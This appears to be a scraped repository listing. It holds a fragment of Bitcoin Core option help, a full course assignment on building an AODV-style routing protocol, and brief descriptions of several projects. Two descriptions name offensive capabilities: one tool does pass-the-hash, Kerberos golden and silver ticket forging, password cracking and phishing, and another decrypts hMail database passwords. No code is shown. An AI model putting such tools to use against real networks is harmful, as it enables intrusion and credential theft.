isolation (default: 1) -seednode=<ip> Connect to a node to retrieve peer addresses, and disconnect. This option can be specified multiple times to connect to multiple nodes. -timeout=<n> Specify connection timeout in milliseconds (minimum: 1, default: 5000) -torcontrol=<ip>:<port> Tor control port to use if onion listening enabled (default: 127.0.0.1:9051) -torpassword=<pass> Tor control port password (default: empty) -upnp Use UPnP to map the listening port (default: 0) -whitebind=<[permissions@]addr> Bind to the given address and add permission flags to the peers connecting to it. Use [host]:port notation for IPv6. Allowed permissions: bloomfilter (allow requesting BIP37 filtered blocks and transactions), noban (do not ban for misbehavior; implies download), forcerelay (relay transactions that are already in the mempool; implies relay), relay (relay even in -blocksonly mode, and unlimited transaction announcements), mempool (allow requesting BIP35 mempool contents), download (allow getheaders during IBD, no disconnect after maxuploadtarget limit), addr (responses to GETADDR avoid hitting the cache and contain random records with the most up-to-date info). Specify multiple permissions separated by commas (default: download,noban,mempool,relay). Can be specified multiple times. -whitelist=<[permissions@]IP address or network> Add permission flags to the peers connecting from the given IP address (e.g. 1.2.3.4) or CIDR-notated network (e.g. 1.2.3.0/24). Uses the same permissions as -whitebind. Can be specified multiple times. Wallet options: -addresstype What type of addresses to use ("legacy", "p2sh-segwit", or "bech32", default: "bech32") -avoidpartialspends Group outputs by address, selecting all or none, instead of selecting on a per-output basis. Privacy is improved as an address is only used once (unless someone sends to it after spending from it), but may result in slightly higher fees as suboptimal coin selection may result due to the added limitation (default: 0 (always enabled for wallets with "avoid_reuse" enabled)) -changetype What type of change to use ("legacy", "p2sh-segwit", or "bech32"). Default is same as -addresstype, except when -addresstype=p2sh-segwit a native segwit output is used when sending to a native segwit address) -disablewallet Do not load the wallet and disable wallet RPC calls -discardfee=<amt> The fee rate (in BTC/kB) that indicates your tolerance for discarding change by adding it to the fee (default: 0.0001). Note: An output is discarded if it is dust at this rate, but we will always discard up to the dust relay fee and a discard fee above that is limited by the fee estimate for the longest target -fallbackfee=<amt> A fee rate (in BTC/kB) that will be used when fee estimation has insufficient data. 0 to entirely disable the fallbackfee feature. (default: 0.00) -keypool=<n> Set key pool size to <n> (default: 1000). Warning: Smaller sizes may increase the risk of losing funds when restoring from an old backup, if none of the addresses in the original keypool have been used. -maxapsfee=<n> Spend up to this amount in additional (absolute) fees (in BTC) if it allows the use of partial spend avoidance (default: 0.00) -mintxfee=<amt> Fees (in BTC/kB) smaller than this are considered zero fee for transaction creation (default: 0.00001) -paytxfee=<amt> Fee (in BTC/kB) to add to transactions you send (default: 0.00) -rescan Rescan the block chain for missing wallet transactions on startup -spendzeroconfchange Spend unconfirmed change when sending transactions (default: 1) -txconfirmtarget=<n> If paytxfee is not set, include enough fee so transactions begin confirmation on average within n blocks (default: 6) -wallet=<path> Specify wallet path to load at startup. Can be used multiple times to load multiple wallets. Path is to a directory containing wallet data and log files. If the path is not absolute, it is interpreted relative to <walletdir>. This only loads existing wallets and does not create new ones. For backwards compatibility this also accepts names of existing top-level data files in <walletdir>. -walletbroadcast Make the wallet broadcast transactions (default: 1) -walletdir=<dir> Specify directory to hold wallets (default: <datadir>/wallets if it exists, otherwise <datadir>) -walletnotify=<cmd> Execute command when a wallet transaction changes. %s in cmd is replaced by TxID and %w is replaced by wallet name. %w is not currently implemented on windows. On systems where %w is supported, it should NOT be quoted because this would break shell escaping used to invoke the command. -walletrbf Send transactions with full-RBF opt-in enabled (RPC only, default: 0) ZeroMQ notification options: -zmqpubhashblock=<address> Enable publish hash block in <address> -zmqpubhashblockhwm=<n> Set publish hash block outbound message high water mark (default: 1000) -zmqpubhashtx=<address> Enable publish hash transaction in <address> -zmqpubhashtxhwm=<n> Set publish hash transaction outbound message high water mark (default: 1000) -zmqpubrawblock=<address> Enable publish raw block in <address> -zmqpubrawblockhwm=<n> Set publish raw block outbound message high water mark (default: 1000) -zmqpubrawtx=<address> Enable publish raw transaction in <address> -zmqpubrawtxhwm=<n> Set publish raw transaction outbound message high water mark (default: 1000) -zmqpubsequence=<address> Enable publish hash block and tx sequence in <address> -zmqpubsequencehwm=<n> Set publish hash sequence message high water mark (default: 1000) Debugging/Testing options: -debug=<category> Output debugging information (default: -nodebug, supplying <category> is optional). If <category> is not supplied or if <category> = 1, output all debugging information. <category> can be: net, tor, mempool, http, bench, zmq, walletdb, rpc, estimatefee, addrman, selectcoins, reindex, cmpctblock, rand, prune, proxy, mempoolrej, libevent, coindb, qt, leveldb, validation. -debugexclude=<category> Exclude debugging information for a category. Can be used in conjunction with -debug=1 to output debug logs for all categories except one or more specified categories. -help-debug Print help message with debugging options and exit -logips Include IP addresses in debug output (default: 0) -logthreadnames Prepend debug output with name of the originating thread (only available on platforms supporting thread_local) (default: 0) -logtimestamps Prepend debug output with timestamp (default: 1) -maxtxfee=<amt> Maximum total fees (in BTC) to use in a single wallet transaction; setting this too low may abort large transactions (default: 0.10) -printtoconsole Send trace/debug info to console (default: 1 when no -daemon. To disable logging to file, set -nodebuglogfile) -shrinkdebugfile Shrink debug.log file on client startup (default: 1 when no -debug) -uacomment=<cmt> Append comment to the user agent string Chain selection options: -chain=<chain> Use the chain <chain> (default: main). Allowed values: main, test, signet, regtest -signet Use the signet chain. Equivalent to -chain=signet. Note that the network is defined by the -signetchallenge parameter -signetchallenge Blocks must satisfy the given script to be considered valid (only for signet networks; defaults to the global default signet test network challenge) -signetseednode Specify a seed node for the signet network, in the hostname[:port] format, e.g. sig.net:1234 (may be used multiple times to specify multiple seed nodes; defaults to the global default signet test network seed node(s)) -testnet Use the test chain. Equivalent to -chain=test. Node relay options: -bytespersigop Equivalent bytes per sigop in transactions for relay and mining (default: 20) -datacarrier Relay and mine data carrier transactions (default: 1) -datacarriersize Maximum size of data in data carrier transactions we relay and mine (default: 83) -minrelaytxfee=<amt> Fees (in BTC/kB) smaller than this are considered zero fee for relaying, mining and transaction creation (default: 0.00001) -whitelistforcerelay Add 'forcerelay' permission to whitelisted inbound peers with default permissions. This will relay transactions even if the transactions were already in the mempool. (default: 0) -whitelistrelay Add 'relay' permission to whitelisted inbound peers with default permissions. This will accept relayed transactions even when not relaying transactions (default: 1) Block creation options: -blockmaxweight=<n> Set maximum BIP141 block weight (default: 3996000) -blockmintxfee=<amt> Set lowest fee rate (in BTC/kB) for transactions to be included in block creation. (default: 0.00001) RPC server options: -rest Accept public REST requests (default: 0) -rpcallowip=<ip> Allow JSON-RPC connections from specified source. Valid for <ip> are a single IP (e.g. 1.2.3.4), a network/netmask (e.g. 1.2.3.4/255.255.255.0) or a network/CIDR (e.g. 1.2.3.4/24). This option can be specified multiple times -rpcauth=<userpw> Username and HMAC-SHA-256 hashed password for JSON-RPC connections. The field <userpw> comes in the format: <USERNAME>:<SALT>$<HASH>. A canonical python script is included in share/rpcauth. The client then connects normally using the rpcuser=<USERNAME>/rpcpassword=<PASSWORD> pair of arguments. This option can be specified multiple times -rpcbind=<addr>[:port] Bind to given address to listen for JSON-RPC connections. Do not expose the RPC server to untrusted networks such as the public internet! This option is ignored unless -rpcallowip is also passed. Port is optional and overrides -rpcport. Use [host]:port notation for IPv6. This option can be specified multiple times (default: 127.0.0.1 and ::1 i.e., localhost) -rpccookiefile=<loc> Location of the auth cookie. Relative paths will be prefixed by a net-specific datadir location. (default: data dir) -rpcpassword=<pw> Password for JSON-RPC connections -rpcport=<port> Listen for JSON-RPC connections on <port> (default: 8332, testnet: 18332, signet: 38332, regtest: 18443) -rpcserialversion Sets the serialization of raw transaction or block hex returned in non-verbose mode, non-segwit(0) or segwit(1) (default: 1) -rpcthreads=<n> Set the number of threads to service RPC calls (default: 4) -rpcuser=<user> Username for JSON-RPC connections -rpcwhitelist=<whitelist> Set a whitelist to filter incoming RPC calls for a specific user. The field <whitelist> comes in the format: <USERNAME>:<rpc 1>,<rpc 2>,...,<rpc n>. If multiple whitelists are set for a given user, they are set-intersected. See -rpcwhitelistdefault documentation for information on default whitelist behavior. -rpcwhitelistdefault Sets default behavior for rpc whitelisting. Unless rpcwhitelistdefault is set to 0, if any -rpcwhitelist is set, the rpc server acts as if all rpc users are subject to empty-unless-otherwise-specified whitelists. If rpcwhitelistdefault is set to 1 and no -rpcwhitelist is set, rpc server acts as if all rpc users are subject to empty whitelists. -server Accept command line and JSON-RPC commands ~ $
SOYJUN / Implement ODR ProtocolOverview For this assignment you will be developing and implementing : An On-Demand shortest-hop Routing (ODR) protocol for networks of fixed but arbitrary and unknown connectivity, using PF_PACKET sockets. The implementation is based on (a simplified version of) the AODV algorithm. Time client and server applications that send requests and replies to each other across the network using ODR. An API you will implement using Unix domain datagram sockets enables applications to communicate with the ODR mechanism running locally at their nodes. I shall be discussing the assignment in class on Wednesday, October 29, and Monday, November 3. The following should prove useful reference material for the assignment : Sections 15.1, 15.2, 15.4 & 15.6, Chapter 15, on Unix domain datagram sockets. PF_PACKET(7) from the Linux manual pages. You might find these notes made by a past CSE 533 student useful. Also, the following link http://www.pdbuchan.com/rawsock/rawsock.html contains useful code samples that use PF_PACKET sockets (as well as other code samples that use raw IP sockets which you do not need for this assignment, though you will be using these types of sockets for Assignment 4). Charles E. Perkins & Elizabeth M. Royer. “Ad-hoc On-Demand Distance Vector Routing.” Proceedings of the 2nd IEEE Workshop on Mobile Computing Systems and Applications, New Orleans, Louisiana, February 1999, pp. 90 - 100. The VMware environment minix.cs.stonybrook.edu is a Linux box running VMware. A cluster of ten Linux virtual machines, called vm1 through vm10, on which you can gain access as root and run your code have been created on minix. See VMware Environment Hosts for further details. VMware instructions takes you to a page that explains how to use the system. The ten virtual machines have been configured into a small virtual intranet of Ethernet LANs whose topology is (in principle) unknown to you. There is a course account cse533 on node minix, with home directory /users/cse533. In there, you will find a subdirectory Stevens/unpv13e , exactly as you are used to having on the cs system. You should develop your source code and makefiles for handing in accordingly. You will be handing in your source code on the minix node. Note that you do not need to link against the socket library (-lsocket) in Linux. The same is true for -lnsl and -lresolv. For example, take a look at how the LIBS variable is defined for Solaris, in /home/courses/cse533/Stevens/unpv13e_solaris2.10/Make.defines (on compserv1, say) : LIBS = ../libunp.a -lresolv -lsocket -lnsl -lpthread But if you take a look at Make.defines on minix (/users/cse533/Stevens/unpv13e/Make.defines) you will find only: LIBS = ../libunp.a -lpthread The nodes vm1 , . . . . . , vm10 are all multihomed : each has two (or more) interfaces. The interface ‘eth0 ’ should be completely ignored and is not to be used for this assignment (because it shows all ten nodes as if belonging to the same single Ethernet 192.168.1.0/24, rather than to an intranet composed of several Ethernets). Note that vm1 , . . . . . , vm10 are virtual machines, not real ones. One implication of this is that you will not be able to find out what their (virtual) IP addresses are by using nslookup and such. To find out these IP addresses, you need to look at the file /etc/hosts on minix. More to the point, invoking gethostbyname for a given vm will return to you only the (primary) IP address associated with the interface eth0 of that vm (which is the interface you will not be using). It will not return to you any other IP address for the node. Similarly, gethostbyaddr will return the vm node name only if you give it the (primary) IP address associated with the interface eth0 for the node. It will return nothing if you give it any other IP address for the node, even though the address is perfectly valid. Because of this, and because it will ease your task to be able to use gethostbyname and gethostbyaddr in a straightforward way, we shall adopt the (primary) IP addresses associated with interfaces eth0 as the ‘canonical’ IP addresses for the nodes (more on this below). Time client and server A time server runs on each of the ten vm machines. The client code should also be available on each vm so that it can be evoked at any of them. Normally, time clients/servers exchange request/reply messages using the TCP/UDP socket API that, effectively, enables them to receive service (indirectly, via the transport layer) from the local IP mechanism running at their nodes. You are to implement an API using Unix domain sockets to access the local ODR service directly (somewhat similar, in effect, to the way that raw sockets permit an application to access IP directly). Use Unix domain SOCK_DGRAM, rather than SOCK_STREAM, sockets (see Figures 15.5 & 15.6, pp. 418 - 419). API You need to implement a msg_send function that will be called by clients/servers to send requests/replies. The parameters of the function consist of : int giving the socket descriptor for write char* giving the ‘canonical’ IP address for the destination node, in presentation format int giving the destination ‘port’ number char* giving message to be sent int flag if set, force a route rediscovery to the destination node even if a non-‘stale’ route already exists (see below) msg_send will format these parameters into a single char sequence which is written to the Unix domain socket that a client/server process creates. The sequence will be read by the local ODR from a Unix domain socket that the ODR process creates for itself. Recall that the ‘canonical’ IP address for a vm node is the (primary) IP address associated with the eth0 interface for the node. It is what will be returned to you by a call to gethostbyname. Similarly, we need a msg_recv function which will do a (blocking) read on the application domain socket and return with : int giving socket descriptor for read char* giving message received char* giving ‘canonical’ IP address for the source node of message, in presentation format int* giving source ‘port’ number This information is written as a single char sequence by the ODR process to the domain socket that it creates for itself. It is read by msg_recv from the domain socket the client/server process creates, decomposed into the three components above, and returned to the caller of msg_recv. Also see the section below entitled ODR and the API. Client When a client is evoked at a node, it creates a domain datagram socket. The client should bind its socket to a ‘temporary’ (i.e., not ‘well-known’) sun_path name obtained from a call to tmpnam() (cf. line 10, Figure 15.6, p. 419) so that multiple clients may run at the same node. Note that tmpnam() is actually highly deprecated. You should use the mkstemp() function instead - look up the online man pages on minix (‘man mkstemp’) for details. As you run client code again and again during the development stage, the temporary files created by the calls to tmpnam / mkstemp start to proliferate since these files are not automatically removed when the client code terminates. You need to explicitly remove the file created by the client evocation by issuing a call to unlink() or to remove() in your client code just before the client code exits. See the online man pages on minix (‘man unlink’, ‘man remove’) for details. The client then enters an infinite loop repeating the steps below. The client prompts the user to choose one of vm1 , . . . . . , vm10 as a server node. Client msg_sends a 1 or 2 byte message to server and prints out on stdout the message client at node vm i1 sending request to server at vm i2 (In general, throughout this assignment, “trace” messages such as the one above should give the vm names and not IP addresses of the nodes.) Client then blocks in msg_recv awaiting response. This attempt to read from the domain socket should be backed up by a timeout in case no response ever comes. I leave it up to you whether you ‘wrap’ the call to msg_recv in a timeout, or you implement the timeout inside msg_recv itself. When the client receives a response it prints out on stdout the message client at node vm i1 : received from vm i2 <timestamp> If, on the other hand, the client times out, it should print out the message client at node vm i1 : timeout on response from vm i2 The client then retransmits the message out, setting the flag parameter in msg_send to force a route rediscovery, and prints out an appropriate message on stdout. This is done only once, when a timeout for a given message to the server occurs for the first time. Client repeats steps 1. - 3. Server The server creates a domain datagram socket. The server socket is assumed to have a (node-local) ‘well-known’ sun_path name which it binds to. This ‘well-known’ sun_path name is designated by a (network-wide) ‘well-known’ ‘port’ value. The time client uses this ‘port’ value to communicate with the server. The server enters an infinite sequence of calls to msg_recv followed by msg_send, awaiting client requests and responding to them. When it responds to a client request, it prints out on stdout the message server at node vm i1 responding to request from vm i2 ODR The ODR process runs on each of the ten vm machines. It is evoked with a single command line argument which gives a “staleness” time parameter, in seconds. It uses get_hw_addrs (available to you on minix in ~cse533/Asgn3_code) to obtain the index, and associated (unicast) IP and Ethernet addresses for each of the node’s interfaces, except for the eth0 and lo (loopback) interfaces, which should be ignored. In the subdirectory ~cse533/Asgn3_code (/users/cse533/Asgn3_code) on minix I am providing you with two functions, get_hw_addrs and prhwaddrs. These are analogous to the get_ifi_info_plus and prifinfo_plus of Assignment 2. Like get_ifi_info_plus, get_hw_addrs uses ioctl. get_hw_addrs gets the (primary) IP address, alias IP addresses (if any), HW address, and interface name and index value for each of the node's interfaces (including the loopback interface lo). prhwaddrs prints that information out. You should modify and use these functions as needed. Note that if an interface has no HW address associated with it (this is, typically, the case for the loopback interface lo for example), then ioctl returns get_hw_addrs a HW address which is the equivalent of 00:00:00:00:00:00 . get_hw_addrs stores this in the appropriate field of its data structures as it would with any HW address returned by ioctl, but when prhwaddrs comes across such an address, it prints a blank line instead of its usual ‘HWaddr = xx:xx:xx:xx:xx:xx’. The ODR process creates one or more PF_PACKET sockets. You will need to try out PF_PACKET sockets for yourselves and familiarize yourselves with how they behave. If, when you read from the socket and provide a sockaddr_ll structure, the kernel returns to you the index of the interface on which the incoming frame was received, then one socket will be enough. Otherwise, somewhat in the manner of Assignment 2, you shall have to create a PF_PACKET socket for every interface of interest (which are all the interfaces of the node, excluding interfaces lo and eth0 ), and bind a socket to each interface. Furthermore, if the kernel also returns to you the source Ethernet address of the frame in the sockaddr_ll structure, then you can make do with SOCK_DGRAM type PF_PACKET sockets; otherwise you shall have to use SOCK_RAW type sockets (although I would prefer you to use SOCK_RAW type sockets anyway, even if it turns out you can make do with SOCK_DGRAM type). The socket(s) should have a protocol value (no larger than 0xffff so that it fits in two bytes; this value is given as a network-byte-order parameter in the call(s) to function socket) that identifies your ODR protocol. The <linux/if_ether.h> include file (i.e., the file /usr/include/linux/if_ether.h) contains protocol values defined for the standard protocols typically found on an Ethernet LAN, as well as other values such as ETH_P_ALL. You should set protocol to a value of your choice which is not a <linux/if_ether.h> value, but which is, hopefully, unique to yourself. Remember that you will all be running your code using the same root account on the vm1 , . . . . . , vm10 nodes. So if two of you happen to choose the same protocol value and happen to be running on the same vm node at the same time, your applications will receive each other’s frames. For that reason, try to choose a protocol value for the socket(s) that is likely to be unique to yourself (something based on your Stony Brook student ID number, for example). This value effectively becomes the protocol value for your implementation of ODR, as opposed to some other cse 533 student's implementation. Because your value of protocol is to be carried in the frame type field of the Ethernet frame header, the value chosen should be not less than 1536 (0x600) so that it is not misinterpreted as the length of an Ethernet 802.3 frame. Note from the man pages for packet(7) that frames are passed to and from the socket without any processing in the frame content by the device driver on the other side of the socket, except for calculating and tagging on the 4-byte CRC trailer for outgoing frames, and stripping that trailer before delivering incoming frames to the socket. Nevertheless, if you write a frame that is less than 60 bytes, the necessary padding is automatically added by the device driver so that the frame that is actually transmitted out is the minimum Ethernet size of 64 bytes. When reading from the socket, however, any such padding that was introduced into a short frame at the sending node to bring it up to the minimum frame size is not stripped off - it is included in what you receive from the socket (thus, the minimum number of bytes you receive should never be less than 60). Also, you will have to build the frame header for outgoing frames yourselves (assuming you use SOCK_RAW type sockets). Bear in mind that the field values in that header have to be in network order. The ODR process also creates a domain datagram socket for communication with application processes at the node, and binds the socket to a ‘well known’ sun_path name for the ODR service. Because it is dealing with fixed topologies, ODR is, by and large, considerably simpler than AODV. In particular, discovered routes are relatively stable and there is no need for all the paraphernalia that goes with the possibility of routes changing (such as maintenance of active nodes in the routing tables and timeout mechanisms; timeouts on reverse links; lifetime field in the RREP messages; etc.) Nor will we be implementing source_sequence_#s (in the RREQ messages), and dest_sequence_# (in RREQ and RREP messages). In reality, we should (though we will not, for the sake of simplicity, be doing so) implement some sort of sequence number mechanism, or some alternative mechanism such as split-horizon for example, if we are to avoid possible scenarios of routing loops in a “count to infinity” context (I shall explain this point in class). However, we want ODR to discover shortest-hop paths, and we want it to do so in a reasonably efficient manner. This necessitates having one or two aspects of its operations work in a different, possibly slightly more complicated, way than AODV does. ODR has several basic responsibilities : Build and maintain a routing table. For each destination in the table, the routing table structure should include, at a minimum, the next-hop node (in the form of the Ethernet address for that node) and outgoing interface index, the number of hops to the destination, and a timestamp of when the the routing table entry was made or last “reconfirmed” / updated. Note that a destination node in the table is to be identified only by its ‘canonical’ IP address, and not by any other IP addresses the node has. Generate a RREQ in response to a time client calling msg_send for a destination for which ODR has no route (or for which a route exists, but msg_send has the flag parameter set or the route has gone ‘stale’ – see below), and ‘flood’ the RREQ out on all the node’s interfaces (except for the interface it came in on and, of course, the interfaces eth0 and lo). Flooding is done using an Ethernet broadcast destination address (0xff:ff:ff:ff:ff:ff) in the outgoing frame header. Note that a copy of the broadcast packet is supposed to / might be looped back to the node that sends it (see p. 535 in the Stevens textbook). ODR will have to take care not to treat these copies as new incoming RREQs. Also note that ODR at the client node increments the broadcast_id every time it issues a new RREQ for any destination node. When a RREQ is received, ODR has to generate a RREP if it is at the destination node, or if it is at an intermediate node that happens to have a route (which is not ‘stale’ – see below) to the destination. Otherwise, it must propagate the RREQ by flooding it out on all the node’s interfaces (except the interface the RREQ arrived on). Note that as it processes received RREQs, ODR should enter the ‘reverse’ route back to the source node into its routing table, or update an existing entry back to the source node if the RREQ received shows a shorter-hop route, or a route with the same number of hops but going through a different neighbour. The timestamp associated with the table entry should be updated whenever an existing route is either “reconfirmed” or updated. Obviously, if the node is going to generate a RREP, updating an existing entry back to the source node with a more efficient route, or a same-hops route using a different neighbour, should be done before the RREP is generated. Unlike AODV, when an intermediate node receives a RREQ for which it generates a RREP, it should nevertheless continue to flood the RREQ it received if the RREQ pertains to a source node whose existence it has heretofore been unaware of, or the RREQ gives it a more efficient route than it knew of back to the source node (the reason for continuing to flood the RREQ is so that other nodes in the intranet also become aware of the existence of the source node or of the potentially more optimal reverse route to it, and update their tables accordingly). However, since an RREP for this RREQ is being sent by our node, we do not want other nodes who receive the RREQ propagated by our node, and who might be in a position to do so, to also send RREPs. So we need to introduce a field in the RREQ message, not present in the AODV specifications, which acts like a “RREP already sent” field. Our node sets this field before further propagating the RREQ and nodes receiving an RREQ with this field set do not send RREPs in response, even if they are in a position to do so. ODR may, of course, receive multiple, distinct instances of the same RREQ (the combination of source_addr and broadcast_id uniquely identifies the RREQ). Such RREQs should not be flooded out unless they have a lower hop count than instances of that RREQ that had previously been received. By the same token, if ODR is in a position to send out a RREP, and has already done so for this, now repeating, RREQ , it should not send out another RREP unless the RREQ shows a more efficient, previously unknown, reverse route back to the source node. In other words, ODR should not generate essentially duplicative RREPs, nor generate RREPs to instances of RREQs that reflect reverse routes to the source that are not more efficient than what we already have. Relay RREPs received back to the source node (this is done using the ‘reverse’ route entered into the routing table when the corresponding RREQ was processed). At the same time, a ‘forward’ path to the destination is entered into the routing table. ODR could receive multiple, distinct RREPs for the same RREQ. The ‘forward’ route entered in the routing table should be updated to reflect the shortest-hop route to the destination, and RREPs reflecting suboptimal routes should not be relayed back to the source. In general, maintaining a route and its associated timestamp in the table in response to RREPs received is done in the same manner described above for RREQs. Forward time client/server messages along the next hop. (The following is important – you will lose points if you do not implement it.) Note that such application payload messages (especially if they are the initial request from the client to the server, rather than the server response back to the client) can be like “free” RREPs, enabling nodes along the path from source (client) to destination (server) node to build a reverse path back to the client node whose existence they were heretofore unaware of (or, possibly, to update an existing route with a more optimal one). Before it forwards an application payload message along the next hop, ODR at an intermediate node (and also at the final destination node) should use the message to update its routing table in this way. Thus, calls to msg_send by time servers should never cause ODR at the server node to initiate RREQs, since the receipt of a time client request implies that a route back to the client node should now exist in the routing table. The only exception to this is if the server node has a staleness parameter of zero (see below). A routing table entry has associated with it a timestamp that gives the time the entry was made into the table. When a client at a node calls msg_send, and if an entry for the destination node already exists in the routing table, ODR first checks that the routing information is not ‘stale’. A stale routing table entry is one that is older than the value defined by the staleness parameter given as a command line argument to the ODR process when it is executed. ODR deletes stale entries (as well as non-stale entries when the flag parameter in msg_send is set) and initiates a route rediscovery by issuing a RREQ for the destination node. This will force periodic updating of the routing tables to take care of failed nodes along the current path, Ethernet addresses that might have changed, and so on. Similarly, as RREQs propagate through the intranet, existing stale table entries at intermediate nodes are deleted and new route discoveries propagated. As noted above when discussing the processing of RREQs and RREPs, the associated timestamp for an existing table entry is updated in response to having the route either “reconfirmed” or updated (this applies to both reverse routes, by virtue of RREQs received, and to forward routes, by virtue of RREPs). Finally, note that a staleness parameter of 0 essentially indicates that the discovered route will be used only once, when first discovered, and then discarded. Effectively, an ODR with staleness parameter 0 maintains no real routing table at all ; instead, it forces route discoveries at every step of its operation. As a practical matter, ODR should be run with staleness parameter values that are considerably larger than the longest RTT on the intranet, otherwise performance will degrade considerably (and collapse entirely as the parameter values approach 0). Nevertheless, for robustness, we need to implement a mechanism by which an intermediate node that receives a RREP or application payload message for forwarding and finds that its relevant routing table entry has since gone stale, can intiate a RREQ to rediscover the route it needs. RREQ, RREP, and time client/server request/response messages will all have to be carried as encapsulated ODR protocol messages that form the data payload of Ethernet frames. So we need to design the structure of ODR protocol messages. The format should contain a type field (0 for RREQ, 1 for RREP, 2 for application payload ). The remaining fields in an ODR message will depend on what type it is. The fields needed for (our simplified versions of AODV’s) RREQ and RREP should be fairly clear to you, but keep in mind that you need to introduce two extra fields: The “RREP already sent” bit or field in RREQ messages, as mentioned above. A “forced discovery” bit or field in both RREQ and RREP messages: When a client application forces route rediscovery, this bit should be set in the RREQ issued by the client node ODR. Intermediate nodes that are not the destination node but which do have a route to the destination node should not respond with RREPs to an RREQ which has the forced discovery field set. Instead, they should continue to flood the RREQ so that it eventually reaches the destination node which will then respond with an RREP. The intermediate nodes relaying such an RREQ must update their ‘reverse’ route back to the source node accordingly, even if the new route is less efficient (i.e., has more hops) than the one they currently have in their routing table. The destination node responds to the RREQ with an RREP in which this field is also set. Intermediate nodes that receive such a forced discovery RREP must update their ‘forward’ route to the destination node accordingly, even if the new route is less efficient (i.e., has more hops) than the one they currently have in their routing table. This behaviour will cause a forced discovery RREQ to be responded to only by the destination node itself and not any other node, and will cause intermediate nodes to update their routing tables to both source and destination nodes in accordance with the latest routing information received, to cover the possibility that older routes are no longer valid because nodes and/or links along their paths have gone down. A type 2, application payload, message needs to contain the following type of information : type = 2 ‘canonical’ IP address of source node ‘port’ number of source application process (This, of course, is not a real port number in the TCP/UDP sense, but simply a value that ODR at the source node uses to designate the sun_path name for the source application’s domain socket.) ‘canonical’ IP address of destination node ‘port’ number of destination application process (This is passed to ODR by the application process at the source node when it calls msg_send. Its designates the sun_path name for an application’s domain socket at the destination node.) hop count (This starts at 0 and is incremented by 1 at each hop so that ODR can make use of the message to update its routing table, as discussed above.) number of bytes in application message The fields above essentially constitute a ‘header’ for the ODR message. Note that fields which you choose to have carry numeric values (rather than ascii characters, for example) must be in network byte order. ODR-defined numeric-valued fields in type 0, RREQ, and type 1, RREP, messages must, of course, also be in network byte order. Also note that only the ‘canonical’ IP addresses are used for the source and destination nodes in the ODR header. The same has to be true in the headers for type 0, RREQ, and type 1, RREP, messages. The general rule is that ODR messages only carry ‘canonical’ IP node addresses. The last field in the type 2 ODR message is essentially the data payload of the message. application message given in the call to msg_send An ODR protocol message is encapsulated as the data payload of an Ethernet frame whose header it fills in as follows : source address = Ethernet address of outgoing interface of the current node where ODR is processing the message. destination address = Ethernet broadcast address for type 0 messages; Ethernet address of next hop node for type 1 & 2 messages. protocol field = protocol value for the ODR PF_PACKET socket(s). Last but not least, whenever ODR writes an Ethernet frame out through its socket, it prints out on stdout the message ODR at node vm i1 : sending frame hdr src vm i1 dest addr ODR msg type n src vm i2 dest vm i3 where addr is in presentation format (i.e., hexadecimal xx:xx:xx:xx:xx:xx) and gives the destination Ethernet address in the outgoing frame header. Other nodes in the message should be identified by their vm name. A message should be printed out for each packet sent out on a distinct interface. ODR and the API When the ODR process first starts, it must construct a table in which it enters all well-known ‘port’ numbers and their corresponding sun_path names. These will constitute permanent entries in the table. Thereafter, whenever it reads a message off its domain socket, it must obtain the sun_path name for the peer process socket and check whether that name is entered in the table. If not, it must select an ‘ephemeral’ ‘port’ value by which to designate the peer sun_path name and enter the pair < port value , sun_path name > into the table. Such entries cannot be permanent otherwise the table will grow unboundedly in time, with entries surviving for ever, beyond the peer processes’ demise. We must associate a time_to_live field with a non-permanent table entry, and purge the entry if nothing is heard from the peer for that amount of time. Every time a peer process for which a non-permanent table entry exists communicates with ODR, its time_to_live value should be reinitialized. Note that when ODR writes to a peer, it is possible for the write to fail because the peer does not exist : it could be a ‘well-known’ service that is not running, or we could be in the interval between a process with a non-permanent table entry terminating and the expiration of its time_to_live value. Notes A proper implementation of ODR would probably require that RREQ and RREP messages be backed up by some kind of timeout and retransmission mechanism since the network transmission environment is not reliable. This would considerably complicate the implementation (because at any given moment, a node could have multiple RREQs that it has flooded out, but for which it has still not received RREPs; the situation is further complicated by the fact that not all intermediate nodes receiving and relaying RREQs necessarily lie on a path to the destination, and therefore should expect to receive RREPs), and, learning-wise, would not add much to the experience you should have gained from Assignment 2.
kozmic / Js Library Xss FuzzerJavascript library fuzzer. Tries to detect functions which may lead to XSS vulnerabilities if untrusted data is passed to said functions.
SirJohnFranklin / Nist AsdBasically a class which parses the NIST Atomic Spectra Database and saves the data to a dictionary on HDD. You can pass an matplotlib.axis, and the emissions lines will be plotted with an optional normalization factor.
integer-net / LocalStorageMagento 1 extension: Provides an interface to pass data from the server to client side localstorage, to be used with full page cache, for example Varnish.
BroadbentT / ROGUE AGENTA python script file to forensically examine remote computer networks - It can analyse smb and ldap active directory systems, start phishing campaigns, extrapolate hidden data such as subdomains, security identifers, usernames and encrypted passwords; utilise pass the hash techniques, crack and auto import ntds.dit files, create on-demand golden and silver Kerberos tickets and... well, so much more...
GitMirar / HMailDatabasePasswordDecrypterDecrypts blowfish (w. static key) encrypted hMail database password.
botprof / First Order Low Pass FilterThis Jupyter notebook shows one way to implement a simple first-order low-pass filter on sampled data in discrete time.